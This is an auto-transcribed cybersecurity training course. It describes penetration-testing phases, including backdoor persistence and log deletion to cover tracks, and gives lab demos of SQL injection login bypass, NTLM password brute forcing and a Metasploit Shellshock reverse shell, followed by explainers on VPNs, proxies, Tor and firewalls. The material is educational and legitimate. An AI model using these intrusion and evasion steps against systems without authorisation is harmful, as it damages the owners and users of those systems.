anything and everything that will help you validate and give you information about the target is something that you want to do in the reconnaissance phase at this point in time we are not going to question whether whatever information we are getting is useful or not only time will tell depending on the various attacks that we will be building up later on this becomes your baseline this becomes your database with all the information about the victim so that you can come back from later stages back to the reconnaissance phase to look at the information that you have gathered and then you can fine-tune your attacks once you have done that you’re going to uh then start the scanning phase based on the information that you have gathered you’re going to identify live machines within a network once you have identified the live machines you’ll scan them for open ports protocols and procedures any processes that are running and then we going going to identify vulnerabilities within these processes and within these open ports so in the scanning phase uh why do we need to find live machines because we want to find out the machines that have booted up have an operating system and are running on the network if an machine is not available on the network or is in a shutdown mode that machine cannot be hacked through a technical attack then it will be a physical attack where you physically go to the machine and then do whatever you want to do with it for a technical attack you will have to identify the machines that have booted up then you’re going to scan the open ports because that’s going to be our entry point and on the port would be a service that is running so you scan the service as well identify the version of the service and then do a vulnerability scan to identify if there are any vulnerabilities on those services that are running and then based on all of this information we are going to develop our attacks as we go on so once we have this we go on to the gaining access phase where we are going to attack and try to get access to our victim’s machines could be a social engineering attack based on the information gathering we have done in the technical assessment and scanning phase if we have identified a vulnerability we’re going to identify a relevant exploit and then use that exploit to try to gain access or we might just craft a trojan and try to uh execute that trojan on the victim’s machine to uh check if we can get access through that particular manner once we have the access could be even a simple password cracking attack which we have been able to accomplish and we have cracked the password of the person and now we have gained access to that person’s computer right but these attacks would be temporary for example we have cracked a password somebody changes the password every 30 days after that period our attack would be useless if a Trojan is executed we get a connection to that machine for once but then how do we get get a repeated connection over and over again if we want to reconnect to that machine so that’s where we come into the maintaining access phase where we install uh rootkits key loggers sniffers and things like that where we could get a backdoor entry to the victim’s machine if we have already been successfully installed a Trojan we would want to add the Trojan to the startup menu so that every time the operating system starts the Trojan gets automatically executed and thus we maintain the backdoor entry to that victim’s machine once we have done all of this all these activities are going to leave a trace in the victim’s machine so if you install a Trojan a Trojan being an application would create directories and files a virus would be destructive in nature if you’re executing a script it will leave some logs behind if we even log in through the cracked password that we have it will create a login entry at for that particular time stamp along with the IP address that we utilized in the covering tracks we are essentially trying to avoid detection by deleting traces of our activity that means that we need to identify where logs have been stored we need to address those logs and we need to delete them or modify them in such a way that our activity is not traceable so these are the five main phases of a penetration test gather as much information as you can scan for machines ports protocols and services running on the victim’s device try to gain access by password cracking trojans exploits for the vulnerabilities if any maintain that access by installing further software which will allow you to gain backdoor access to that particular system and then try to cover your tracks by deleting all traces of your activity once successful the victim will have no idea and you have a back door entry and you can monitor the victim to the extent that you want now in an ethical hacker’s perspective this penetration test can be done in multiple aspects so again understand the fact that we are doing an authorized activity we have identified the tools that we have to use identified the attacks we have got the appropriate authorization and based on that authorization we are conducting a penetration test the penetration test may be asked to be done in one of these manners first is the blackbox test the blackbox test is where no information is given to the ethical hacker about the IT infrastructure so they have no idea what it is they start right from the first phase of the information gathering gather as much information they can and based on the gathered information they try to create and launch attacks to see if they are going to be successful now not only does it test the knowledge of the penetration tester it would also test the security implementations that the organization has done to see whether they can identify the attack and prevent it in the first place so this is the simulation of a malicious hacker scenario where a malicious hacker having no idea about the organization first tries to gather information and then tries to attack that organization so no source code knowledge no technological knowledge nothing they’re just going to try to gather information scan those devices and then try to gain access the second test is a gray box test where some information is given or some knowledge of the IT infrastructure is given think of it from a employees perspective a regular employee in an organization who doesn’t have extra privileges like an administrator but is just a regular employee does that means that they got limited access within the organization based on which they get some knowledge of the IT infrastructure so this is an attempt of an insider uh simulation attack where a regular user may want to try to misuse the access that they’ve been given and then try to gather information or try to gain access to other devices which they are not authorized to the third test is white box where is full knowledge of the IT infrastructure that has been given so this is again a simulation of an insider attack a malicious insider if you will but at this point in time the person has complete knowledge of the infrastructure could be in an administrative position and then they are trying to leverage their access to see if they can get information or they can compromise any stuff any of the data so the three attacks would be the first one black box where we are simulating a external threat a hacker sitting outside the organization trying to gain access the gray box is an insider threat where there’s a regular employee who is trying to get access to infrastructure that they are not authorized for and then the third audit is a white box audit where there’s an administrator who has all the leverage all the access and the visibility within the uh infrastructure and then they are trying to misuse their access to see what else they can get from whatever access has been authorized to them now let’s look at the areas of penetration testing where all could we do a penetration test thus compromising the security of the application or of the server or of the user so first and foremost network services it finds vulnerabilities and weaknesses in the security of the network infrastructure so for example we have switches routers firewalls in the network all of these are devices that need a configuration if they have been not correctly configured or if they have not been correctly secured they would leave some vulnerabilities behind if we as ethical hackers are able to identify these flaws these misconfigurations these vulnerabilities we could then try to exploit them and try to gain access to the network and devices within that network by uh getting access to the network in the first place then we have the web applications web applications are nothing but softwares that are developed over or deployed over a web server and are made available over the internet or the internet for example uh websites that we visit or web applications like Facebook if you will right so if these applications have vulnerabilities within them we then try to attack the web- based applications and thus try to bypass authentication or get access to database or try to leak information through those applications if not then we try to attack the client side now web application is at the server level and is hosted by the deployer so that’s at the server side the client side is where we as users are using a computer with a browser and trying to interact with the web application now the browser and the operating system that we are utilizing would have its own vulnerabilities thus identifying a client side vulnerability and then exploiting it to either either hack the client or then piggyback on the client’s connection and try to get access to the server so either you could attack the network the web application or the client side itself or you could attack wireless networks this test would examine all the wireless devices which are used in a corporation most of the wireless would have laptops smartphones tablets fabts all of those connected to them if you’re able to access any of these devices through the wireless it would help you gain access to other devices on the wireless as well and then social engineering so this is where you’re trying to attack humans you’re tricking an employee of a corporation to reveal some confidential information knowingly or unknowingly by tricking them with uh fake mails or fake websites or malicious emails that you have sent to them uh which they have failed to recognize as malicious and they click on it thus getting victimized social engineering attacks are always uh successful because of the gullibility of humans empathy sympathy humans basically have emotions emotions can be toyed with and then taken advantage of if the person is not careful enough for example the most common social engineering attack that we see is the Nigerian fraud where we receive an email that someone somewhere has died and has left a huge estate behind a few hundred million and we have been identified as the person through whom they want to transfer the money to a foreign land to save on taxes what are the chances of that happening on a daily basis right how many princes are there so that’s something that we do not verify it’s just the I guess the greed if you will of striking it rich quickly that makes us believe these kind of emails uh we have also received emails of lottery tickets that we have won over a period of time without even having bought a lottery ticket so if you haven’t bought one what did you win but we don’t ask these questions we just get excited about the amount of money that we have won and then we try to bet on our luck and try to see if that uh email is going to fruify or is it just another scam so social engineering attacks are dime a dozen these days and we need to be very careful on what we trust on the internet let’s look at the penetration testing tools there are hundreds and thousands of tools out there most of these have been conseded and collected together and hosted on a operating system known as Kali Linux that we have talked about earlier now the predecessor to Kali Linux was backtrack backtrack is no longer continued it has been discontinued and Kali Linux has taken uh the place of backtrack within which are all the tools that you see on your screen metasloit is one of the most favorite penetration testing tools of hackers and ethical hackers uh there are a lot of inbuilt exploits over there and we’ll be doing a demo at the end of the session on this n MAPAP is the information gathering tool which will scan for live devices scan for open ports protocols and services beef would be an application testing tool that would help us uh find exploits within applications nessus vulnerability scanner is a network and a hostbased scanner that would help you identify vulnerabilities within such hosts wireshark is a network sniffer which allows you to capture network packets and and analyze them to see if there are there is any information worth capturing within those packets sql map is a automated tool used for SQL injection attacks so you don’t even have to craft your queries for SQL injection it will be done by the SQL map tool you just need to identify whatever is possible through the queries that this SQL is going to create and then based on the activity that you’ve identified you just need to redefine your search parameters to get access to the database we’ll be doing a demo on SQL map or SQL map as well and then there is John the Ripper john the Ripper is a tool that is used for password cracking so dictionary attacks brute force attacks are done using John the Ripper what is a dictionary attack a dictionary attack is an attack where we create list of all probable passwords store them in a txt file and run that list against the password tool to see if any of those passwords are going to match a brute force attack is trying the same attack but with every permutation and combination of the alphabet that we have and we’re going to try to figure out uh if we are able to crack the password at all so these are just some of the tools for every tool there are another supporting 100 tools or more than that uh like for NSS vulnerability scanner you’ll have college vulnerability scanner you have uh GFI LAN card and there are other lots of other softwares out there but these are some of the most commonly utilized tools let’s look at the metas-ploit attack metas-ploit is a framework of penetration testing that makes hacking very simple you just need to know how to utilize the tool you need to identify the vulnerability associated with a particular exploit and then run the exploit on metasloit we’ll be demoing this during the practical so there are active exploits and passive exploits in active exploit exploits a specific computer runs until execution and then exits uses brute force and exits when an error occurs in a passive exploit these exploits wait for incoming requests and exploit them as soon as they connect they can also be used in conjunction with emails and web browsers so in passive exploits we create a payload we uh like a reverse connection payload we send it to the victim once the victim installs that software the machine will then initiate a connection to us our machine will be in a listen mode and then we will once that software is executed at their end we would then try to connect and exploit that particular vulnerability this is the uh practical that we’ll be doing on metasloit so let’s move on with the demos and then we’ll see uh what we can discuss amongst them all right let’s have a look at some of the demos that we had uh talked about in the ethical hacking and penetration testing module we are going to look at three different demos the first one is going to be a SQL injection attack that we’re going to perform on this tool that we have the second one is a password cracking attack on Windows 7 and the third one is a meter reader based or a metastasoid based shell shock attack on a Linux based web server so let’s get cracking i’ve powered on this virtual machine uh which is the OAS broken web application it is a tool that is provided for people who want to enhance their skills and they can practice uh how to do these attacks in a legal manner so we are going to go to this site i’m just going to open up my browser the IP address is 71.132 and that’s the OAS broken web application that we want to utilize we’re going to head off to mutility 2 and we are going to look at a SQL injection attack where we want to bypass authentication now this takes us to the login screen so we can just try our luck here and see that the authentication mechanism works the account does not exist so the username and password that we have supplied is not the correct one so we want to ensure that there’s a SQL database and uh we can uh try to attack it and see uh if we can bypass the authentication now uh what we want to do is we want to create a SQL based malformed query that can give us a different output so I’m just going to type in a single quote over here and type login and you can see that this is now suddenly recognized as a operator and there’s an error that is given out compared to the login that we tried uh earlier when we used a proper textbased login mechanism it gave us the account does not exist but here the single code gave us a error and it shows us how SQL works this is the query that we had created now in the trainings that you have for ethical hacking there would be explanations of what these queries are all about how the syntax works here we just going to see if we can create a mal for query to log in as a user in this case so what I’m going to do is uh create the query over here and we’re going to give it a comparison so we’re going to give it a or 1= 1 spacey space and if you now click login you should be able to bypass authentication and you can see user has been authenticated and we now have admin access to this application now here the SQL queries need to be crafted in such a perspective that they’re going to work so there would be a lot of exercise in identifying what the database is there’s a Microsoft database an Oracle database and so on so forth and then you have to choose those proper commands but identifying that would come in the training right now we’re just looking at de at a demo this is how a SQL injection attack works now let me log out here similarly now we are in a login page the same query work wonders where it allowed us to bypass authentication so it also depends on what kind of a page I am and what query would be accepted at this point in time so here application understanding would also come into the picture where uh which function we are calling upon when we are connected to a particular page now this is a user lookup function right so again here we try the same method test that’s not going to work authentication error bad user on password and if we type in the same query over here single quote or and give it a condition single quote or 1= 1 space now here it is not going to log us in because this is not a login page this is a user lookup form so here it would instead give us a dump of all the databases that it has so you can see all the usernames and passwords coming in that are stored in the user lookup field so this is where the understanding comes in of which query to create at what page where depending upon the function that is being called right so that’s the SQL uh injection attack that we wanted to look at let’s move on to password tracking now this is a Windows 7 machine that we have i’m just going to do a very basic password tracking example we’re just going to log in now here the assumption is that we are able to log in we have access to a computer and we want to check out other users who are using this computer and see if we can find out their passwords so that uh we can log in as a different user steal data if required and we wouldn’t be to blame if there are any logs that are created so here we’ve got a tool called Kane enable that is installed right here now I’m already an administrator on this machine i’m checking out other administrators who share the same privileges or any other user who may be on this system whose password I can crack and thus I would be able to get access through their account and then do any malicious activity right so this allows me to go into a cracker tool and it allows me to enumerate this machine and identify all the users and passwords that are there in this particular machine right so I’m just going to click on the plus sign and I’m going to import uh hashes from a local system so where are these files stored where does Windows store its passwords in what format are they stored and what this tool does to retrieve those that’s something that we all need to know as a ethical hacker right so import the hashes from the local system click on next it’s going to enumerate that file and it is going to give you a list of all the users that are there so you can see the users or hacker admin test the one that we are logged in as and then there’s a user called virus as well and you can see that this is the hash value of the password that is being utilized now there’s a particular format uh for a hash value for Windows and how it stores but once we have these hash values let’s say if I want to crack this password there are various attacks that we can do for example a dictionary based attack or a brute force attack let’s try a brute force attack right nlm is the hashing mechanism that is used by Windows so we’re going to try to create an NTLM hash attack and here we’re going to use a predetermined rule set for example we are not sure what characters are being utilized over here so we just create an attack like this using all characters and uh lowerase A through Z uppercase A through Z numeric 0 through 9 and all the special characters let’s say the password is between 7 and 16 characters and this is the character set that we want to try the brute force attack on what is a brute force attack it is an attack where the computer is going to try each and every permutation and combination out of this character set and try to figure out if the password is going to be correct so if we click start it’s going to start with a particular characters and then it is going to identify if that NLM hash is going to work against this character and you can see the time is going to be phenomenal over here so it’s not necessary that this attack would be viable it will be 100% successful given the time frame however the time frame is huge enough for this attack to become a little bit redundant there are other attacks that we can do which can easily identify this data for us as well but that is something that we will look on in future videos so that’s how we can get access to users and passwords uh there are different mechanisms where let’s say we don’t have login access then what are we going to do how we can create a fake user login or how we can remotely access a machine and then try to get the same access and that is what we are going to try to do in the next demo on a Linux machine so what we are doing in a Linux machine could also be doable on the Windows machine with a different exploit so what I’m going to do is this is the Linux web server that I have that I’m going to power on i’m going to use a Kali Linux machine to hack that device and I’m going to just power off my Windows 7 machine give it a minute till it boots up now this is also a demo machine that we have which has its own preconfigured vulnerabilities so here we’ve got something from the pentesters lab uh and has a shell shock vulnerability implemented inside shell shock vulnerability uh affects Linux Mac and Unix based operating systems for a particular version of the bash shell bash is the bone again shell which is the command line interface in these operating systems so what we are trying to do here is we are going to use the Kali Linux machine try to find out the vulnerability over here and if it exists we are going to use metasloit to attack this machine now the first and foremost thing is we want to identify the IP address we have no idea what the IP address is we are in the same subnet so we are assuming that we’re able to connect to this machine so what I’m going to do is I’m going to open up a tool called Zen Map i’m going to open up a command line interface find out what my IP address is and my IP address is this with a subnet mask of 255255255.0 so I want to see if there are any other machines that are live in the same subnet and we are doing a ping sweep over here to identify which machines are live in a minute we’ll get all the IP addresses 71.1 2 133 254 and 128 we know that we are 128 at this point in time uh 254 is the DHCP server so we assuming that 133 is the machine that we want to look at and let’s then try to see if we can scan that machine 133 and we’re going to do an intent scan to find out which ports are open what services are running over there and if it is whether the pentest machine that we were looking for you can see of the start port 22 and port 80 and somewhere here it’s going to give us the ports that are open and the details about those ports and somewhere here it will tell us that this is the pentester lab machine that we wanted which is correct so now we want to do a vulnerability analysis on this what we are going to do is I’m going to use another GUI based tool called Sparta which I can just find out from here sparta uses two tools in the background end mapap tool and a tool called nikto so we’re just going to start scanning 1926 16871.133 was the IP address add to scope and over a period of time you can see all of these will start populating with information there we are that’s the Nikto tool coming in scanning on port 80 which is uh which means that it’s a web server using HTTP it tells us it’s an Apache HTT HTTPD2.2.21 and gives us the 22 port number as well if we head over to the tab of Nikto or let’s look at the screenshot first this is what the website would be looking like and Nikto gives us the options over here it tells us that there is a vulnerability over here for shell shock and this is the path where the vulnerability is going to exist so what we going to do we go back to the command line sorry we open up a new one minimize all these other windows and we’re going to open up Metasloit metasloit is a penetration testing tool that is used by most hackers and ethical hackers to test applications and test uh existing exploits and vulnerabilities so just give it a minute till it starts you can see there are already around 1,700 exploits right here uh we’re going to see all those exploits with these commands there we are sorry for the typo and it will just give us a list of all the exploits that are stored in metasloit in this version so all of these are Windows based if we scroll up we will be looking at other vulnerabilities as well or exploits the unique specs exploits Linax OSX multi exploits and we’re looking for a exploit for um multi-based Apache or HTTP let’s go up uh let’s look at So this is the one that we’re looking for apache mod CGI bash environmental executable so what we’re going to do is we’re just going to copy it go back to the bottom say use exploit and paste the one that we wanted press enter say show options so it’ll ask us to configure this i’m just going to configure it based on the knowledge that we have set our host which is the remote host the victim’s machine so we put in the IP address it asks us for the target URI so that’s the path that we saw set target URI to CGI- bin / status enter now with the exploit we need to find a payload that is going to give us the output that we want so we say show payloads and it will give us a list of all the compatible payloads with this exploit and we want to create a reverse TCP connection which is this so we know it’s a Linux operating system we want this uh payload to be set so set payload press enter that’s the payload coming in show options now that we have set the payload this is the options for the exploit and now we want to set our options for the payloads as well so we are creating a reverse TCP connection which means we are remotely executing code at the victim side and making the victim connect back to our machine which means we need to set up a listener so I need to put my IP address over here set local host or LHOST 192 16871 128 which was our IP address show options again just to ensure everything is fine which looks like it is and we then type in the word exploit so that it will start this attack i can see that it has created a meta session at the victim site and it has opened up a session so if I do a pwd now pwd is a Linux command for present working directory and it will show us that we’ll connect it to where dubdubdub cgi- bin do an ls it will list all the files that’s the status file over there do a cd backslash it will take us to the root of this machine and if you’re someone who is interested in building a career in cyber security that is by graduating from the best universities or a professional who sits to switch careers with cyber security by learning from the experts then try giving a short to simply learns post-graduate programming cyber security with modules from the MIT Schwarzman College of Engineering and the course link is mentioned in the description box that will navigate you to the course page where you can find a complete overview of the program being offered jude is waiting at the airport to hop on her flight back home when she realizes that she missed making an important bank payment she connects her laptop to the public Wi-Fi at the airport and goes ahead to carry out the bank transaction everything goes well and Jude completes her transaction after a couple of days she was wiped off her feet when she learned that her bank account was subjected to a cyber attack and a hefty amount was wiped from her account after getting in touch with the bank authority she learned that her account was hacked at the airport she then realized that the public Wi-Fi she used might have caused her this trouble jude wishes that had her bank transfer escaped the hacker’s eyes she would not have been a victim of a cyber attack bank officials advise her to use a VPN for future transactions especially when connecting to an open or public network like most of us Jude had come across the term VPN several times but didn’t know much about it and little did she think that the repercussions of not using a VPN would be this bad let’s understand how the hacker would have exploited Jude’s transaction in the absence of a VPN in this process Jude’s computer first connects to the internet service provider ISP which provides access to the internet she sends her details to the bank’s server using her IP address internet protocol address or IP address is a unique address that recognizes a particular device be it a laptop or smartphone on the internet when these details pass through the public network the hacker who passively watches the network traffic intercepts it this is a passive cyber attack where the hacker collects Jude’s bank details without being

    detected more often or not in such an attack payment information is likely to be stolen the targeted data here are the victim’s username passwords and other personal information such an unsecured connection exposed Jude’s IP address and bank details to the hacker when it passed through the public network so would Jude have been able to secure her transaction with the help of a VPN well yes picture Jude’s bank transaction to be happening in a tunnel that is invisible to the hacker in such a case the hacker will not be able to spot her transaction and that is precisely what a VPN does a virtual private network more often known as VPN creates a secure tunnel between your device and the internet for using a VPN Jude’s first step would be to install softwarebased technology known as the VPN client on her laptop or smartphone that would let her establish a secure connection the VPN client connects to the Wi-Fi and then to the ISP here the VPN client encrypts Jude’s information using VPN protocols data is encrypted to make sure it is secure next the VPN client establishes a VPN tunnel within the public network that connects to the VPN server the VPN tunnel protects Jude’s information from being intercepted by the hacker jude’s IP address and actual location are changed at the VPN server to enable a private and secure connection finally the VPN server connects to Jude’s bank server in the last step where the encrypted message is decrypted this way Jude’s original IP address is hidden by the VPN and the VPN tunnel protects her data from being hacked this explains how VPN makes your data anonymous and secure when it passes through the public network and the difference between a normal connection and a VPN connection after learning about this Jude was certain that she should start using a VPN to carry out her online transactions in the future this is also applicable to each one of us even if you work remotely or connect to public Wi-Fi using a VPN is the safest option in addition to providing a secure encrypted data transfer VPNs are also used to disguise your whereabouts and give you access to regional web content vpn servers act as proxies on the internet this way your actual location cannot be established vpn enables you to spoof your location and switch to a server to another country and thereby change your location for example by doing so you can watch any content on Netflix that might be unavailable for your region meet Jonathan he is an investigative journalist who occasionally researches and publishes news articles contrary to the government’s ideologies on one such occasion he could not access a global news website dealing with uncensored information it seemed his IP was blocked from visiting the news website with his IP blocked Jonathan turned to a popular proxy service that was able to unblock the news website thereby allowing an open internet to all users just like how your friend gives a proxy attendance for you a proxy server serves as a stand-in user to keep the real client private but what is a proxy let’s understand its working by taking a look at how Jonathan was able to access geoblock content without much hassle a proxy server acts as a gateway or intermediary server between a user and its destination website when Jonathan wasn’t able to access the news website he connected his system to a global proxy server once connected the proxy server assigns a new IP address to Jonathan’s system an IP address of a different country where the website is not censored following this process whenever Jonathan visits that website the website administrators see the new IP address assigned via proxy server and sees no reason to deny access to their account once the proxy server is able to access the website it’s passed on to Jonathan’s system via the same channel regarding accessibility to proxy servers you must first set it up on your computer device or network next check the steps required for your computer or network as each operating system has its setup procedures in most cases however setup entails using an automated configuration script there are plenty of free proxy services available on the internet however the safety of such proxies is rarely verified most free proxies will provide an IP address and a relevant port for connection purposes reputed proxy providers like Smart Proxy and Bright Data that run on subscription models will most likely provide credentials to log into when establishing the connection this extra step acts as authentication that verifies an existing subscription on the proxy provider server unlike free providers that are open to all when it comes to hiding IP addresses many people consider a VPN to be the primary solution while that’s true up to some extent there are a few things proxies do differently in the case of VPNs extra encryption is also carried out to create a secure tunnel between the user’s device and a VPN server a VPN is usually much faster more secure thanks to multiple layers of encryption and has little to no downtime proxies tend to be comparatively unsafe with the service owners having the exact IP address of the end user and having no guarantees regarding downtimes and reliability if you want to know more about how VPNs work do watch how Jude could have protected her banking credentials using VPNs in our detailed video linked above now let’s take a small quiz to check how much we have learned what can a VPN connection provide that a proxy service cannot a new IP address b multiple layers of encryption c access to Geobblock content d authentication credentials think about it and leave your answers below in the comments section and three lucky winners will receive Amazon gift vouchers what about the benefits of a proxy service though besides allowing access to blocked content proxies can serve as an efficient firewall system they can also filter content from third party websites allowing control over internet usage in many cases browsing speeds are stabilized compared to vanilla internet thanks to proper optimization of the base proxy server the element of privacy proxies provides is highly lucrative to people looking to hide their actual IP address from as many prying eyes as possible one can easily argue the benefits of using VPNs over proxies for added security measures however a few basic tasks don’t warrant maximum privacy for the user’s side as in other cases for example many consumers worldwide find proxy services more convenient since all major operating systems starting from Windows to Android allow proxy configuration without the hassle of installing new applications as is in the case of a VPN in addition there are services online that function as web proxies allowing users to access block content without any setup from their end they can enter the target URL and the web proxy will route data from its physical server this level of freedom is hard to come by in the case of VPNs making proxies an ideal solution for casual browsing with the next generation of internet exchanges focused on maximum privacy and security a variety of ways have been enforced to maintain them as such censorship has been shifted from the streets to the digital domain it forces the standard citizen to derive alternative ways to maintain anonymity a major weapon in this battle for privacy and security is the to browser an independent browser meant to browse the internet while relaying information through the to network it serves as a meaningful alternative to the standard internet browsing habits to better understand the purpose of this browser and such you must learn about the work of the to network featuring its own routing protocol the TO browser is an easy way to maintain anonymity while browsing without emptying one’s wallet let’s take a look at the topics to be covered today we start at the explanation of what is the to network and its significance in the working of the to browser we take a look at the onion routing protocol and how it transmits the data from the client devices to the to directories in order to circumvent government censorship moving on we learn a few features of the to browser and the distinct advantages the to network provides next we learn the difference between using a VPN and a tour to anonymize internet usage and finally we have a live demonstration of the to browser anonymization features in action let’s move on to learning about the to network to short for the onion router it’s an open-source privacy network that permits users to browse the web anonymously the to was initially developed and solely used by the US Navy to protect sensitive government communications before the network was made publicly available the digital era has disrupted the traditional way of doing things in every sector of the economy the rapid rise in development and innovation of digital products has given way to frequent data breaches and cyber thefts in response consumers are increasingly opting for products that offer data privacy and cyber security to is one such underground network that was implemented for the purpose of protecting users identities the to network is one example of the many emerging technologies that attempt to fill a data privacy void in a digital space plagued by cyber security concerns the to network intercepts the traffic from your browser and bounces a user’s request of a random number of other user IP addresses then the data is passed to the user requested final destination these random users are volunteer devices which are called as nodes or relays the to network disguises your identity by encrypting the traffic and moving it across different to relays within the network the to network uses an onion routing technique for transmitting data hence the original name of onion router to operate within the to network a user has to install the to browser any address or information requested using the browser is transmitted through the to network it has its own feature set which we will be going over later in this video as we discussed already the data passing through the to network must follow a unique protocol known as the onion routing protocol let us learn more about its unique characteristics in our normal network usage the data is transmitted directly the sender has data packets to transmit which is done directly over a line of communication with either a receiving party or a server of some kind however since the data can easily be captured while being transmitted the security of this exchange is not very reliable moreover it becomes very easy to trace the origin of such requests on many occasions websites with questionable and controversial content are blocked from the ISP this is possible since the ISP is able to detect and spy on user information passing through the network apart from ISPs there is a steady chance of your private information being intercepted by hackers unfortunately easy detection of the source and contents of a web request make entire network extremely vulnerable for people who seek anonymity over the internet however in the onion routing protocol things take a longer route we have a sender with the top browser installed on the client system the network sends the information to node 1’s IP address which encrypts the information and passes it on to node 2’s address which performs another encryption and passes it on to node 3 address this is the last address which is also known as the exit node this last node decrypts the encrypted data and finally relays the request to the final destination which can be another device or a server end this final address thinks the request came from the exit node and grants access to it the encryption process across multiple computers repeats itself from the exit node to the original user the to network obiscates user IP addresses from unwanted surveillance by keeping the user’s request untraceable with multiple servers touching the data it makes the tracking very difficult for both ISPs and malicious attackers now that we understand the way to works let us learn more about the to browser the to browser was developed by a nonprofit organization as a part of the to project in 2008 and its first public release was announced the to browser is a browser fork from the popular Firefox that anonymizes your web traffic using the to network if you’re investigating a competitor researching an opposing litigant in a legal dispute or just think it’s creepy for your ISP or the government to know what websites you visit the top browser might be the right solution before the top browser were developed using that network to maintain anonymity was a huge task for everyday consumers starting from the setup to the usage the entire process demanded a lot of knowledge and practice the to browser managed to make it easy for users to traverse the relay servers in to guarantee the privacy of the data exchange a major feature of the to browser is the ability to delete all browser history cookies and tracking data the moment it is closed every new launch of the browser opens an empty slate having your usage habits from being tracked and singled out a major feature that is the highlight of the to network is the availability of onion links only a small portion of the worldwide web is available to the general public we have the deep web that contains links that are not allowed to be indexed by standard search engines like Google and Bing the dark web is a further subset of the deep web which contains onion links to browser gives you access to these onion websites which are only available within the to network onion is a special use tople domain which designates an anonymous onion service which is also known as a hidden service similar to the links of the deep web these onion links provide services like online shopping cryptocurrency and many other products not available in the consumer internet space often being considered as a haven for illegal activities and sales on your links provide both information and assets in a private manner without the risk of spying by authorities browsing the web over to is slower than the clear net due to the multiple layers of encryption some web services also block to users tor browser is also illegal in authoritarian regimes that want to prevent citizens from reading publishing and communicating anonymously journalists and dissidents around the world have embraced store as a cornerstone of democracy and researchers are hard at work at improving towards anonymity properties let us take a look at some of the advantages of using the to browser over standard web browsers the highlight of using the to browser is to maintain anonymity over the internet the cause for such requests can differ from person to person but all of these concern are answered by the to network douting the information via multiple nodes and relay servers make it entirely difficult for the ISP to keep a track of usage data the entire to project is designed to be completely free and open source allowing the code for the browser to be inspected and audited by third parties helps in the early detection of faulty configurations and critical bugs it is present for multiple operating system starting from laptops to mobile devices a number of websites are blocked by governments for a variety of reasons journalists under authoritarian regimes have difficulty in getting the word out regarding the situation since the onion routing protocol transfers data between multiple servers of random countries the domains being blocked become available when used via to usage of these encryption messaging platforms is easily enforced using the to browser which otherwise would have been a difficult task under oppressive circumstances many people believe that a VPN offers the same benefits as the top browser let’s put both of them to the test and see the differences between them coming to the first point of difference to is completely free and open-source all of the code for the browser and the network can be audited and has been cleared for security concerns when it comes to VPN there are many different brands which have open- source clients but the same cannot be said for their counterparts some have partly open source while some have completely locked up their code so that they cannot be stolen further moving on to has multiple relay points in its data transfer protocol between the server and the receiver there are three different IP nodes that number can increase but it’ll always be more than two once the data is passed from the sender it goes through all of those relay points while in the case of a VPN the connection is made from the client device to the VPN server and then to the requested destination there is no other IP node that comes into work here thereby making the connection a onetoone between the client and a VPN as a next point since store handles multiple layers of encryption and the data passes through multiple systems along the way the performance is slow compared to a VPN where the performance is relatively fast due to the less number of nodes the data passes through similarly the multi-layer encryption of to is consistent if you use to browser every single request passes through the same layer of encryption and follows the same routing protocol in the case of a VPN different companies offer different levels of encryption some have multihop some prefer a single onetoone connection and these kind of differences make the choice much more variable finally the nodes and relays being used in the to network are volunteer there is no company holding over them so jurisdiction becomes relatively straightforward whereas in the case of VPNs many such VPNs are hosted by adware companies or are being monitored by central governments to note the usage information now that we have a better understanding of the to browser and its routing let us take a look at how the to browser can anonymize and protect our internet usage on opening up the to browser for the first time this is the page that you’re going to be welcomed with you have the option of connecting to the to network before we start our browsing so let’s press connect and we can see that it is connected coming to the anonymization let’s check my current location on Google Chrome currently is showing as Na’vi Mumbai in Maharashtra if we check the same link on the to browser we should get a different address now every link that we open in the to browser will be little delayed and the speed will be hampered because of the multiple layers of encryption like we discussed now as you can see it’s showing a German IP and the state of Bavaria this is how the anonymization works there is no VPN configured there is no proxy attached it’s straight up the out of the box settings that come inbuilt with the tour browser similarly we have an option of cleaning up the data let’s say if you want to refresh your location and you want to use a different ID for the next browsing session if you just restart it once and you can have to check it again we should be seeing a different country this time as you can see we have Netherlands right now so this is how you can keep refreshing your address you can keep refreshing your host location so that you cannot be tracked when in browsing the internet like we discussed we have some onion links that can only be used on the to network as you can see these kind of links do not open in the Google Chrome browser but once we copy these over to the tour browser as you can see we have opened the hidden wiki which is available only on the tour network this is kind of an alternative Wikipedia website where we can find articles to read and more information to learn similarly we have another onion link over here which is once again available only for the tour browser now these kind of delays are expected but they are a valid compromise because they maintain the anonymity that many people desire similarly we have found a hidden wallet which is a cryptocurrency wallet which is specifically for dark web members this operates over the tour network and this is used by mostly journalists and people who want to anonymize their internet transactions when it comes to dealing money all of the transactions that occur over the to network are almost impossible to track therefore these kind of cryptocurrency wallets are very big on the deep web this is just one example while having multiple different wallets for every single cryptocurrency available imagine our houses without a fence or boundary wall this would make our property easy accessible to trespassers and robbers and place our homes at great risk right hence fencing our property helps safeguard it and keeps trespassers at bay similarly imagine our computers and networks without protection this would increase the probability of hackers infiltrating our networks to overcome this challenge just like how boundary walls protect our houses a virtual wall helps safeguard and secure our devices from intruders and such a wall is known as a firewall firewalls are security devices that filter the incoming and outgoing traffic within a private network for example if you were to visit your friend who lives in a gated community you would first take permission from the security guard the security guard would check with your friend if you should be allowed entry or not if all is well your access is granted on the other hand the security guard would not grant permission to a trespasser looking to enter the same premises here the entry access depends solely on your friend the resident’s discretion the role of the security guard in this case is similar to that of a firewall the firewall works like a gatekeeper at your computer’s entry point which only welcomes incoming traffic that it has been configured to accept firewalls filter the network traffic within your network and analyzes which traffic should be allowed or restricted based on a set of rules in order to spot and prevent cyber attacks your computer communicates with the internet in the form of network packets that hold details like the source address destination address and information these network packets enter your computer through ports the firewall works on a set of rules based on the details of these network packets like their source address a destination address content and port numbers only trusted traffic sources or IP addresses are allowed to enter your network when you connect your computer to the internet there is a high chance of hackers infiltrating your network this is when a firewall comes to your rescue by acting as a barrier between your computer and the internet the firewall rejects the malicious data packet and thus protects your network from hackers on the other hand traffic from trusted websites is allowed access to your network this way the firewall carries out quick assessments to detect malware and other suspicious activities thereby protecting your network from being susceptible to a cyber attack firewalls can either be hardware or software software firewalls are programs installed on each computer this is also called a host firewall meanwhile hardware firewalls are equipments that are established between the gateway and your network links routers are a good example of a hardware firewall besides this there are other types of firewalls designed based on their traffic filtering methods structure and functionality the firewall that compares each outgoing and incoming network packet to a set of established rules such as the allowed IP addresses IP protocols port number and other aspects of the packet is known as a packet filtering firewall if the incoming network traffic is not perfed rules that traffic is blocked a variant of the packet filtering firewall is the stateful inspection firewall these types of firewalls not only examine each network packet but also checks 